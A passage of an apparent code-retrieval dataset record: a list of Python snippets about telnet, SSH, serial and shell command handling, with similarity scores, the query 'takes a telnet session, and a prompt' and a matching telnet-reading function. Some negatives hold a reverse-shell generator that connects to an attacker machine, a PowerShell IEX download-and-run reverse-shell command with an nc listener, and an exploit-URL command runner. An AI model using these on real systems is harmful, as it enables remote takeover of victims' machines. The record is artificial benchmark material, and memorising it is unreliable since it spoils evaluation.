'telnet 192.168.255.1 15007'\n aashell_prompt = 'AaShell>'\n\n self._current.write(login_aashell)\n self._current.read_until_regexp(aashell_prompt)\n flag = 1\n\n return flag", "def wait_for_command_execution(self, timeout=None, check_fun=None):\n if check_fun is None:\n def check_fun2(buf, whole_data):\n # TODO: expose via logging config entry\n if self.verbose_logger is not None:\n self.verbose_logger.debug(\"expecting '%s', got: '%s'\", self.shell_prompt, buf)\n\n return self.re_shell_prompt.search(whole_data)\n\n check_fun = check_fun2\n try:\n res = self.process_output(\n NetUtil.wait_for_socket_result(self.sock,\n check_fun,\n read_buf_size=SOCKET_READ_BUF_SIZE,\n timeout=timeout\n )\n )\n except NetUtil.Timeout as e:\n # netstat_uds = run_shell(\"netstat -ape -A unix\")\n # open_fds = run_shell('ls -l /proc/%s/fd/' % os.getpid())\n # lsof = run_shell('lsof -U')\n # debug:\n\n # Active Unix Domain Sockets:\n # %s.\n # Open file handles (Unix):\n # %s\n # lsof:\n # %s\n # % (netstat_uds, open_fds, lsof))\n # log exception to node log\n if self.brief_logger:\n self.brief_logger.exception(e)\n\n raise\n return res", "def getoutput(cmd):\n return getstatusoutput(cmd)[1]", "def get_python_code(self, badchars, localhost, localport):\n\n if not localhost or not localport:\n print \"Settings for connectback listener must be defined\"\n return False\n\n pythoncode = \"\"\n pythoncode += \"\"\"\n#!/usr/bin/python\nimport socket,subprocess\n\nHOST = 'LOCALHOST' # The remote host\nPORT = LOCALPORT # The same port as used by the server\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# connect to attacker machine\ns.connect((HOST, PORT))\n\n# send we are connected\ns.send('[*] Connection Established!')\n# start loop\nwhile 1:\n # recieve shell command\n data = s.recv(1024)\n print data\n\n # if its quit, then break out and close socket\n if data == 'quit' or data == 'q':\n break\n\n # do shell command\n proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n # read output\n stdout_value = proc.stdout.read() + proc.stderr.read()\n # send output to attacker\n s.send(stdout_value)\n# close socket\ns.close()\n\"\"\"\n\n pythoncode = pythoncode.replace(\"LOCALHOST\", str(localhost))\n pythoncode = pythoncode.replace(\"LOCALPORT\", str(localport))\n\n return pythoncode", "def run_at_command(self, cmd=\"AT\\r\", timeout=1000):\n self.__atresponse_received = False\n # Send command via serial\n if self._serport is None:\n raise StationException(\"Port \" + self.portname + \" is not open\")\n\n # Skip wireless packets\n self._atresponse = \"(\"\n # Send serial packet\n self._serport.send(cmd)\n \n # Wait for response from modem\n while len(self._atresponse) == 0 or self._atresponse[0] == '(':\n if not self._wait_for_response(timeout):\n return None\n # Return response received from gateway\n return self._atresponse", "def command(cmd: list, stdin: str):\n proc = Popen(cmd, stdout=PIPE, stderr=STDOUT, stdin=PIPE)\n out, err = proc.communicate(stdin.encode(\"utf-8\"))\n exit = proc.wait()\n return out.decode(\"utf-8\")", "async def _run_cmd(self, cmd, timeout=5):\n try:\n self._flush_buffer()\n self.pexpect_child.sendline(cmd)\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n stdout = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else \"\"\n self.pexpect_child.sendline(\"echo $?\")\n ret = self.pexpect_child.expect_exact(\n [self.cmd_prompt, pexpect.TIMEOUT], timeout=timeout\n )\n exit_status = self.parse_cmd_output(self.pexpect_child.before) if ret == 0 else -1\n try:\n exit_status = int(exit_status)\n except ValueError:\n exit_status = -1\n return exit_status, stdout\n except Exception as e:\n self.applog.exception(\"Exception occured --> _run_command\", exc_info=e)\n raise", "def ssh_command(client, command):\n _stdin, _stdout, _stderr = client.exec_command(command, get_pty=True, timeout=60)\n _stdout.channel.recv_exit_status()\n return _stdout.readlines()", "def execute_ssh_command(self, command, password=\"\", username=\"root\", expected_return_code=\"0\"):\n try:\n print self._current.read()\n except:\n pass\n self._current.write(command)\n ret = self._current.read_until_regexp(self._current._prompt)\n\n #modify begin (chenjin 2012-06-25)\n #case failed for return code in lines[2] not lines[0] or lines[1]\n return_code_flag = \"return code is:\"\n return_code = 0\n self._current.write(\"echo %s$?\"%return_code_flag)\n raw_return_code = self._current.read_until_regexp(self._current._prompt)\n\n return_lines = raw_return_code.splitlines()\n## try:\n## return_code = int(return_lines[0])\n## except ValueError:\n## try:\n## return_code = int(return_lines[1])\n## except ValueError:\n## return_code = int(return_lines[2])\n\n for line in return_lines:\n if line.startswith(return_code_flag):\n return_code = int(line.lstrip(return_code_flag).strip())\n #modify end (chenjin 2012-06-25)\n\n if return_code != int(expected_return_code):\n raise RuntimeError(\"Command '%s' returned '%s' but '%s' was expected\"%(command, return_code,expected_return_code))\n return ret", "def send_receive(remote, shellcode):\n time.sleep(0.5)\n remote.send(shellcode)\n return struct.unpack('q', r.read(8))[0]", "def ask(self):\n subprocess.run([\"say\", \"-v\", \"Kyoko\", str(self.answer)])", "def client_connected(self, telnet_connection):", "def waitprompt(c):\n c.expect('\\n> ')\n time.sleep(0.1)", "def call_session_process(session, msg):\n # print(\"Send packet to session process\")\n session.fdp.send(msg)\n try:\n reply = session.fdp.recv()\n # print(\"Receive reply from session process\")\n if reply.header.mtype == MSG['OK']:\n return 0\n else:\n return -1\n except EOFError:\n return -1", "def send_command(command, timeout_time = set_err_codes.tcs_coms_timeout):\n\t\n\ttry:\n\t\t#Send the command to the TCS\t\n\t\toutput = subprocess.run(['ssh','wasp@tcs', command],\n\t\t\t\tcapture_output=True, timeout=timeout_time)\n\texcept subprocess.TimeoutExpired:\n\t\tlogger.critical('Failed to contact TCS')\n\telse:\n\t\tresponse = output.stdout\n\t\n\t#get rid of repeated command\n\tresponse = response.decode('utf-8')\n\tlogger.info('FROM TCS: '+response)\n\treturn response", "def Prompt(self):\n self.cli.context_was_set = not self.cli.config.context\n doc = self.cli.run()\n return doc.text if doc else None", "async def call_function(self, command, params=[]):\n data = bytearray(2 + len(params))\n data[0] = _HOSTTOPN532\n data[1] = command & 0xFF\n for i, val in enumerate(params):\n data[2+i] = val\n \n # Send the frame and read the response\n await self._write_frame(data)\n response = await self._read_frame()\n\n if len(response) < 2:\n raise RuntimeError('Received smaller than expected frame')\n \n if not(response[0] == _PN532TOHOST and response[1] == (command+1)):\n raise RuntimeError('Received unexpected command response!')\n \n # Return response data.\n return response[2:]", "def _rawshell(args):\n rows, cols = util.term_rows_cols()\n file = Config.V0_POWERSHELL_CONPTY()\n # Random port for temporary serv\n port = util.randport()\n psurl = httpserv.powershell_serv(args.address, str(port), file)\n pscmd = f\"IEX({psurl}); Invoke-ConPtyShell -RemoteIp {args.address} -RemotePort {args.port} -Rows {rows} -Cols {cols}\"\n remote_commands = [\n f\"powershell -nop -c {pscmd}\",\n f\"powershell -nop -e {powershell_base64_encode(pscmd)}\",\n ]\n lcmd = f\"stty raw -echo; (stty size; cat) | nc -lvnp {args.port}\"\n _print_remote(remote_commands)\n _print_local(lcmd)\n # small delay to allow the above stuff to finish before the raw terminal\n # makes stuff look wonky\n time.sleep(2)\n os.system(lcmd)\n # Reset the tty\n os.system(\"stty sane\")", "def state_cmd(self, byte):\n if byte in telnet_cmds:\n self.telnet_cmd.append(byte)\n if 251 <= byte <= 254:\n self.next_fn = self.state_option\n elif byte == 250:\n self.next_fn = self.state_sub\n else:\n self.handle_telnet_cmd(self.telnet_cmd)\n self.next_fn = self.state_text\n else:\n # unknown/invalid command\n self.next_fn = self.state_text", "def sdi_send_command_get_reply(cmd_to_send, sdi_bus=\"Port1\"):\n\n if sdi_bus_valid(sdi_bus):\n reply = command_line('!SDI {} {}'.format(sdi_bus, cmd_to_send), 128)\n if \"Got reply: \" in reply:\n reply = reply.replace(\"Got reply:\", \"\")\n else:\n raise Sdi12Error(\"No such bus\", sdi_bus)\n\n reply = reply.strip()\n return reply", "def __call__(self, session: Serial, callback=_process_result) -> list[str]:\n print(f\"Tx: {self.printable_command}\")\n s = session.write(self.command)\n session.write(self.command)\n sleep(self.default_timeout)\n in_waiting = session.in_waiting\n r = session.read(in_waiting)\n print(f\"Rx: {self.printable_bytestring(r)}\")\n r = callback(self, r)\n\n return r", "def _rc_get(self, cmd, buffersize=0):\n if not cmd.endswith('\\n'):\n cmd = cmd + '\\n'\n cmd = cmd.encode()\n self.SOCK.sendall(cmd)\n # allways read at least 2 bytes!\n answer = self.SOCK.recv(buffersize + 2)\n return answer.decode('utf-8').split('\\r\\n> ')[0]", "def get_answer_msg(self, resposta, cmd):\n\n # Busco na resposta o final do comando executado porque depois disso é o resultado desse comando\n caracters_to_match = cmd[len(cmd)-3:-1] # se o comando tiver menos que três caracteres vai ter problema\n len_carac_to_match = len(caracters_to_match)\n len_resp = len(resposta)\n pos_init = resposta.rfind(caracters_to_match, 0, len_resp-1)\n pos_fim = resposta.rfind(\"\\n\", 0, len_resp)\n\n r = resposta[pos_init + len_carac_to_match + 1: pos_fim] # aqui encontrado a resposta do comnado executad\n\n return r", "def telnet_login(\n self, username_pattern=r\"(?:user>)\", alt_prompt_term=r\"#\\s*$\", **kwargs\n ):\n self.TELNET_RETURN = self.RETURN\n return super().telnet_login(\n username_pattern=username_pattern,\n alt_prompt_terminator=alt_prompt_term,\n **kwargs\n )", "def input(self, prompt):\r\n return console_input(prompt)", "def execute(self, command):\n to_send = self.exploit_url + command\n to_send = URL(to_send)\n response = self._uri_opener.GET(to_send)\n return shell_handler.extract_result(response.get_body())", "def myrun(cmd):\n\tp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\tstdout = []\n\twhile True:\n\t\tline = p.stdout.readline()\n\t\tstdout.append(line)\n\t\t#print line\n\t\tph1 = line[9:19]\n\t\t#print (ph1)\n\t\tif ph1 == 'no carrier':\n\t\t\tmail(\"NOT WORKING\")\n\t\t\ttime.sleep(60)", "def send(self, cmd='AT\\r\\n', input=None): \n try:\n if input:\n data=[]\n #self.ser.write(\"AT+CMGW=\\\"\"+str(10)+\"\\\"\\r\\n\")\n self.ser.write(cmd+\"\\\"\"+str(10)+\"\\\"\\r\\n\")\n data.append(self.ser.readline().replace('\\r','').replace('\\n',''))\n time.sleep(.05)\n #self.ser.write(\"test Function\"+chr(26))\n self.ser.write(input+chr(26))\n data+=self.parse_data(self.ser.readlines())\n return data\n else: \n self.ser.flush()\n self.ser.write(cmd)\n self.timeout=0.1 #find min\n data=self.ser.readlines()\n return self.parse_data(data)\n\n except serial.serialutil.SerialException:\n if restart:\n print 'port disconnected'\n else:\n self.restart_serial()\n self.test_cmd(False,True)", "def command_shell(\n session_name,\n window_name,\n socket_name,\n socket_path,\n command,\n shell,\n use_pythonrc,\n use_vi_mode,\n):\n server = Server(socket_name=socket_name, socket_path=socket_path)\n\n util.raise_if_tmux_not_running(server=server)\n\n current_pane = util.get_current_pane(server=server)\n\n session = util.get_session(\n server=server, session_name=session_name, current_pane=current_pane\n )\n\n window = util.get_window(\n session=session, window_name=window_name, current_pane=current_pane\n )\n\n pane = util.get_pane(window=window, current_pane=current_pane) # NOQA: F841\n\n if command is not None:\n exec(command)\n else:\n if shell == \"pdb\" or (os.getenv(\"PYTHONBREAKPOINT\") and PY3 and PYMINOR >= 7):\n from tmuxp._compat import breakpoint as tmuxp_breakpoint\n\n tmuxp_breakpoint()\n return\n else:\n from ..shell import launch\n\n launch(\n shell=shell,\n use_pythonrc=use_pythonrc, # shell: code\n use_vi_mode=use_vi_mode, # shell: ptpython, ptipython\n # tmux environment / libtmux variables\n server=server,\n session=session,\n window=window,\n pane=pane,\n )", "def prompt(self):\n return input(self.message + \": \").strip()" ]
[ "0.70798624", "0.7071471", "0.70600575", "0.6706458", "0.6631486", "0.64974564", "0.6339306", "0.62638974", "0.6244074", "0.6220981", "0.60587776", "0.6056408", "0.60353273", "0.5993267", "0.5937854", "0.5930016", "0.59039897", "0.5903268", "0.58991635", "0.5847472", "0.58356094", "0.5806358", "0.5773433", "0.5756125", "0.5742472", "0.5703352", "0.56670576", "0.56666905", "0.5650056", "0.5649486", "0.5602105", "0.5572944", "0.5565549", "0.55436623", "0.5520593", "0.55016464", "0.54998773", "0.54845655", "0.54590535", "0.54464054", "0.54406214", "0.54346365", "0.540772", "0.53980577", "0.5389881", "0.5358399", "0.53547734", "0.5353078", "0.5352684", "0.53484905", "0.53280765", "0.5304719", "0.53033805", "0.53019315", "0.53006005", "0.5297266", "0.52935404", "0.52927536", "0.5285449", "0.52798927", "0.5278842", "0.5278717", "0.5278077", "0.527658", "0.5268394", "0.52659804", "0.52561074", "0.5251871", "0.52469766", "0.5244049", "0.52328336", "0.5227031", "0.5225536", "0.5225461", "0.52239966", "0.52217185", "0.5208106", "0.52047205", "0.5202862", "0.52017957", "0.51991534", "0.5192403", "0.5190125", "0.51794255", "0.51773995", "0.5174187", "0.51698905", "0.516304", "0.51585895", "0.51524425", "0.51460415", "0.5135739", "0.51295716", "0.5129109", "0.5127103", "0.5125552", "0.51214916", "0.5109753", "0.5101714", "0.50986737" ]
0.56606126
28
takes a telnet session, and a prompt
def wait(t,p): output_list = [] c = '' d = '' while p not in d: c = t.read_very_eager() if len(c) > 0: d += c print c output_list.append(c) if "Press any key to continue" in c or "--More--" in c: t.write(" ") output_list = ((''.join(output_list)).replace('\r\n','\n')).split('\n') return output_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def telnet_run(self, cmd_list, prompt_usr='Username:', prompt_pwd='Password:', prompt_ena='>',\n prompt_conf=']', timeout=2, LOGIN_LOG=0):\n prompt_usr = prompt_usr.encode(\"ascii\")\n prompt_pwd = prompt_pwd.encode(\"ascii\")\n prompt_ena = prompt_ena.encode(\"ascii\")\n prompt_conf = prompt_conf.encode(\"ascii\")\n screen_buffer = {'host': self.host}\n log_sleep_time = 1\n output = ''\n try:\n tn = telnetlib.Telnet(self.host, port=23, timeout=1)\n except:\n screen_buffer = 'none'\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 0, 'screen_buffer': screen_buffer}\n return result\n else:\n # login\n # username info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_usr, timeout).decode('ascii')\n else:\n tn.read_until(prompt_usr, timeout)\n tn.write(self.usr.encode(\"ascii\") + b'\\n')\n # password info\n if self.pwd:\n if LOGIN_LOG:\n output = output + tn.read_until(prompt_pwd, timeout).decode('ascii')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(self.pwd.encode(\"ascii\") + b'\\n')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(b'\\n')\n # login info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_ena, timeout).decode('ascii')\n else:\n tn.read_until(prompt_ena, timeout + 1)\n tn.write(b'\\n') # make the first command in prompt\n # run cmd_list\n for cmd in cmd_list:\n tn.write(cmd.encode(\"ascii\") + b'\\n')\n time.sleep(0.5)\n output = output + tn.read_very_eager().decode('ascii')\n # tn.read_until(prompt_conf, timeout)\n\n screen_buffer = output\n tn.close()\n\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 1, 'screen_buffer': screen_buffer}\n return result", "def telnet(shell='/bin/bash'):\n assert(sys.stdin.isatty())\n c.setVerbose(False)\n\n # Open a PTY and spawn a bash connected to the slave end on the remote side\n code = 'import pty; pty.spawn([\\'{}\\', \\'-i\\'])'.format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...\n # Should maybe put some more functionality into the inline python code instead.\n\n # Save current TTY settings\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n\n # Put TTY into raw mode\n tty.setraw(sys.stdin)\n\n # Resize remote terminal\n # Nice-to-have: also handle terminal resize\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n') # terminal echo\n recvtil('READY\\r\\n') # command output\n\n interact()\n\n # Restore previous settings\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)", "def telnet_login(self, **kwargs):\n raise NotImplementedError", "def telnet():\r\n print('''\\n%s at %s acting as user %s\r\n\\nTelnet Service Menu''' % (PACKETMASTER.model, ADDRESS, USERNAME))\r\n choice = moves.input('''\r\n 1 - Get current Telnet status\r\n 2 - Enable or Disable Telnet service\r\n 3 - Back\r\n 4 - Quit \\n\r\n Enter selection number: ''')\r\n try:\r\n choice = int(choice)\r\n except ValueError as reason:\r\n print(\"That is not a valid selection.\", reason)\r\n telnet()\r\n execute = {1: PACKETMASTER.get_telnet,\r\n 2: PACKETMASTER.set_telnet_guided,\r\n 3: hardwareconfig,\r\n 4: exit}\r\n if choice in execute:\r\n try:\r\n select = execute[choice]\r\n run = select()\r\n print(run)\r\n telnet()\r\n except KeyError as reason:\r\n print(reason)\r\n else:\r\n print(\"That is not a valid selection.\")\r\n telnet()", "def telnet1(node):\n if len(node) == 2:\n # we received env and node name\n env = node[0]\n running = helpers.check_sim_running(env)\n node = node[1]\n elif len(node) == 1:\n # assume default env\n env = \"default\"\n running = helpers.check_sim_running(env)\n node = node[0]\n else:\n exit(call([get_command(), \"telnet\", \"--help\"]))\n\n if running:\n sim_name = running\n server = VIRLServer()\n details = server.get_sim_roster(sim_name)\n\n if node:\n try:\n node_dict = get_node_from_roster(node, details)\n node_name = node_dict.get(\"NodeName\")\n ip = node_dict[\"managementIP\"]\n proxy = node_dict.get(\"managementProxy\")\n\n # use user specified telnet command\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=ip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n\n if proxy == \"lxc\":\n lxc = get_mgmt_lxc_ip(details)\n click.secho(\"Attemping telnet connection\" \" to {} at {} via ssh {}\".format(node_name, ip, lxc))\n cmd = 'ssh -t {}@{} \"telnet {}\"'\n cmd = cmd.format(server.user, lxc, ip)\n\n exit(call(cmd, shell=True))\n else:\n # handle the \"flat\" networking case\n click.secho(\"Attemping telnet connection\" \" to {} at {}\".format(node_name, ip))\n exit(call([\"telnet\", ip]))\n\n except AttributeError:\n click.secho(\"Could not find management info \" \"for {}:{}\".format(env, node), fg=\"red\")\n\n except KeyError:\n click.secho(\"Unknown node {}:{}\".format(env, node), fg=\"red\")\n else:\n return details.json()", "def __init__(self, prompt, ip_address, port):\n self._ip_address = ip_address\n self._port = int(port)\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._sock.connect((self._ip_address, self._port))\n self._prompt = prompt\n while True:\n reply = self._receive(False)\n if reply is not None:\n if to_str(reply) == self._prompt:\n break\n else:\n break", "def telnet(node):\n server = VIRLServer()\n client = get_cml_client(server)\n\n current_lab = get_current_lab()\n if current_lab:\n lab = safe_join_existing_lab(current_lab, client)\n if lab:\n try:\n node_obj = lab.get_node_by_label(node)\n except NodeNotFound:\n click.secho(\"Node {} was not found in lab {}\".format(node, current_lab), fg=\"red\")\n exit(1)\n\n if node_obj.is_active():\n mgmtip = get_node_mgmt_ip(node_obj)\n if mgmtip:\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=mgmtip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n else:\n click.secho(\"Attemping telnet connection to {} at {}\".format(node_obj.label, mgmtip))\n\n exit(call([\"telnet\", mgmtip]))\n else:\n click.secho(\"Node {} does not have an external management IP\".format(node_obj.label))\n else:\n click.secho(\"Node {} is not active\".format(node_obj.label), fg=\"yellow\")\n else:\n click.secho(\"Unable to find lab {}\".format(current_lab), fg=\"red\")\n exit(1)\n else:\n click.secho(\"No current lab set\", fg=\"red\")\n exit(1)", "def telnet(self):\n self.log.info(\"connect-via-telnet\")\n telnet = distutils.spawn.find_executable(\"telnet\")\n os.execv(telnet, (\"telnet\", \"localhost\", str(self.qemu.monitor_port)))", "def telnet_console_port(self):\n logging.info('Telnet to console port with ip %s and port %s',self.console_ip, self.act_port)\n console = pexpect.spawn('telnet %s %s' % (self.console_ip, self.act_port))\n console.logfile = self.log\n console.sendline('')\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT])\n while i >= 0:\n if i == 0:\n console.close()\n logging.info('telnet_console_port, Timed out, Not able to access console')\n raise TimeoutError('telnet_console_port, Timed out, Not able to access console')\n if i == 1:\n console.close()\n logging.info('telnet_console_port, Eof error, Not able to access console')\n raise EofError('telnet_console_port, Eof error, Not able to access console')\n if i == 2:\n console.close()\n logging.info('telnet_console_port, Password error')\n raise PasswordError('telnet_console_port, Password error')\n if i>2 and i<8:\n console.close()\n logging.info(\"telnet_console_port, switch is booting so load and check\")\n raise BootingError(\"telnet_console_port, switch is booting so load and check\")\n if i == 8 or i == 9:\n console.close()\n logging.info('telnet_console_port, Switch in loader/boot prompt')\n raise LoaderError('telnet_console_port, Switch in loader/boot prompt')\n if i == 10 or i == 11:\n console.sendline('exit')\n if i == 12:\n console.sendline('admin')\n if i == 13:\n console.sendline(self.switch_pwd)\n if i == 14:\n break\n i = console.expect([pexpect.TIMEOUT, pexpect.EOF, LOGIN_INCORRECT, \\\n 'Abort Auto Provisioning and continue.*', 'enable admin vdc.*', \\\n 'enforce secure password.*', 'the basic configuration dialog.*', \\\n 'the password for.*', LOADER_PROMPT, BOOT_PROMPT, BASH_SHELL, DEBUG_SHELL, \\\n SWITCH_LOGIN, PWD_PROMPT, SWITCH_PROMPT], 5)\n \n return console", "def client_connected(self, telnet_connection):", "def handle_telnet_cmd(self, telnet_cmd):\n print(\"Telnet cmd: {}\".format(telnet_cmd))\n # termious hack\n if self.termious is None:\n if len(telnet_cmd) == 8:\n if telnet_cmd[0] == 250 and telnet_cmd[1] == 31:\n self.termious = True\n if len(telnet_cmd) == 2:\n if telnet_cmd[0] == 251 and telnet_cmd[1] == 31:\n self.termious = False", "def put_prompt(self, session):\n self.reply_text(session, self._prompt, False)", "def send_telnet_command(command):\n\n tn = telnetlib.Telnet(stb_parameters.STB_IP)\n tn.read_until(bytes(\"login: \", 'UTF-8'))\n tn.write(bytes(stb_parameters.STB_USER_NAME + \"\\n\", 'UTF-8'))\n tn.write(bytes(command + \"\\n\", 'UTF-8'))\n tn.write(bytes(\"exit\\n\", 'UTF-8'))\n result = tn.read_all().decode('ascii')\n return result", "def waitprompt(c):\n c.expect('\\n> ')\n time.sleep(0.1)", "async def send_commandTelnet(self, cmd, pattern=None, timeout=None):\n\n # Debug info message\n log.info(\"send_commandTelnet\")\n\n # Default value of timeout variable\n if timeout is None:\n timeout = self.timeout\n\n # Add carriage return at the end of the command (mandatory to send the command)\n cmd = cmd + \"\\n\"\n\n # Sending command\n self._writer.write(cmd.encode())\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n try:\n\n # Read data\n while True:\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=timeout\n )\n\n # Display info message\n log.info(f\"send_commandTelnet: byte_data: '{byte_data}'\")\n\n # Temporary convertion in string. This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(f\"send_commandTelnet: output: '{output}'\")\n\n # Is a patten used?\n if pattern:\n\n # Use pattern instead of prompt\n if pattern in output:\n\n # Yes\n\n # Leave the loop\n break\n\n else:\n\n # Check if prompt is found\n if self.check_if_prompt_is_found(output):\n\n # Yes\n\n # Leave the loop\n break\n\n except asyncio.TimeoutError:\n\n # Time out during when reading prompt\n\n # Display error message\n log.error(\"send_commandTelnet: connection: timeout\")\n\n # Exception propagation\n raise\n\n except Exception as error:\n\n # Error during when reading prompt\n\n # Display error message\n log.error(f\"send_commandTelnet: error: {error}\")\n\n # Exception propagation\n raise\n\n # Convert data (bytes) into string\n output = byte_data.decode(\"utf-8\", \"ignore\")\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: raw output: '{output}'\\nsend_commandTelnet: raw output (hex): '{output.encode().hex()}'\"\n )\n\n # Remove the command sent from the result of the command\n output = self.remove_command_in_output(output, str(cmd))\n # Remove the carriage return of the output\n output = self.remove_starting_carriage_return_in_output(output)\n # Remove the ending prompt of the output\n output = self.remove_ending_prompt_in_output(output)\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: cleaned output: '{output}'\\nsend_commandTelnet: cleaned output (hex): '{output.encode().hex()}'\"\n )\n\n # Check if there is an error in the output string (like \"% Unrecognized command\")\n # and generate an exception if needed\n self.check_error_output(output)\n\n # Return the result of the command\n return output", "def connect(self):\n\n self.wm = telnetlib.Telnet(self.ip, self.port, self.timeout)\n time.sleep(2)\n print self.wm.read_very_eager() #clears connection message\n self.measure_chan()", "def telnet_login(\n self, username_pattern=r\"(?:user>)\", alt_prompt_term=r\"#\\s*$\", **kwargs\n ):\n self.TELNET_RETURN = self.RETURN\n return super().telnet_login(\n username_pattern=username_pattern,\n alt_prompt_terminator=alt_prompt_term,\n **kwargs\n )", "def _postConnect(self):\n p = self.spawnProc\n msg = \"SessionManager._postConnect: failed to get prompt\"\n expList.append(self.prompt)\n match = p.expect(expList, self.sshTimeout)\n self._postCheck(match,msg,True)", "def test_direct_access_telnet_mode(self):\n self.assert_enter_command_mode()\n\n # go into direct access\n self.assert_direct_access_start_telnet(timeout=600)\n self.tcp_client.send_data(\"#D\\r\\n\")\n if not self.tcp_client.expect(\"\\r\\n\"):\n self.fail(\"test_direct_access_telnet_mode: did not get expected response\")\n \n self.assert_direct_access_stop_telnet()", "def ask(self, prompt: str) -> str:\n raise NotImplementedError", "def prompt() -> None:\n\n username = click.prompt(\n text=\"Please enter a username\",\n type=click.STRING\n )\n password = click.prompt(\n text=\"Please enter a new password\",\n hide_input=True,\n confirmation_prompt=True\n )\n newsletter_subscription = click.prompt(\n text=\"Would you like to subscribe to our newsletter?\",\n default=False,\n type=click.BOOL\n )\n favorite_color=click.prompt(\n text=\"What is your favorite color?\",\n type=click.Choice([\"blue\", \"green\", \"yellow\"], case_sensitive=False)\n )\n\n click.echo(\n f\"Username: {username} | Password: {'*' * len(password)} | \"\n + f\"Newsletter: {newsletter_subscription} | Favorite color: \"\n + click.style(favorite_color, fg=favorite_color)\n )", "def showPrompt(self):\r\n self.terminal.nextLine()\r\n self.terminal.write(self.ps[self.pn])", "def passPrompt(title, prompt):\n answer = tkSimpleDialog.askstring(title, prompt, show=\"*\")\n print answer", "def connect(host: str, port: int):\n print('Connecting to the server...')\n print(cmd.RESP_OK, type(cmd.RESP_OK))\n tn = telnetlib.Telnet(host = host, port = port)\n code, params = cmd.serv_read_resp(tn)\n if code != cmd.RESP_OK:\n print(f'Connection problem. {code, params}')\n exit(0)\n print(f'{params[0]}\\n')\n return tn", "async def interactive_shell():\n # Create Prompt.\n session = PromptSession('Say something: ')\n\n # Run echo loop. Read text from stdin, and reply it back.\n while True:\n try:\n result = await session.prompt(async_=True)\n print('You said: \"{0}\"'.format(result))\n except (EOFError, KeyboardInterrupt):\n return", "def __alt_prompt(self, prompt_text: str):\r\n if self.__use_windows_prompt:\r\n sys.stdout.write(prompt_text)\r\n sys.stdout.flush()\r\n i = sys.stdin.readline()\r\n return i.strip()\r\n return input(prompt_text)", "def login (self,server,username,password='',terminal_type='ansi',original_prompts=r\"][#$]|~[#$]|bash.*?[#$]|[#$] \",login_timeout=10):\r\n cmd = \"ssh -l %s %s\" % (username, server)\r\n spawn.__init__(self, cmd, timeout=login_timeout)\r\n #, \"(?i)no route to host\"])\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT, \"(?i)connection closed by remote host\"])\r\n if i==0: # New certificate -- always accept it. This is what you if SSH does not have the remote host's public key stored in the cache.\r\n self.sendline(\"yes\")\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT])\r\n if i==2: # password\r\n self.sendline(password)\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT])\r\n if i==4:\r\n self.sendline(terminal_type)\r\n i = self.expect([\"(?i)are you sure you want to continue connecting\", original_prompts, \"(?i)password\", \"(?i)permission denied\", \"(?i)terminal type\", TIMEOUT])\r\n\r\n if i==0:\r\n # This is weird. This should not happen twice in a row.\r\n self.close()\r\n return False\r\n elif i==1: # can occur if you have a public key pair set to authenticate. \r\n ### TODO: May NOT be OK if expect() matched a false prompt.\r\n pass\r\n elif i==2: # password prompt again\r\n # For incorrect passwords, some ssh servers will\r\n # ask for the password again, others return 'denied' right away.\r\n # If we get the password prompt again then this means\r\n # we didn't get the password right the first time. \r\n self.close()\r\n return False\r\n elif i==3: # permission denied -- password was bad.\r\n self.close()\r\n return False\r\n elif i==4: # terminal type again? WTF?\r\n self.close()\r\n return False\r\n elif i==5: # Timeout\r\n # This is tricky... presume that we are at the command-line prompt.\r\n # It may be that the prompt was so weird that we couldn't match it.\r\n pass\r\n elif i==6: # Connection closed by remote host\r\n self.close()\r\n return False\r\n else: # Unexpected \r\n self.close()\r\n return False\r\n # We appear to be in -- reset prompt to something more unique.\r\n if not self.set_unique_prompt():\r\n 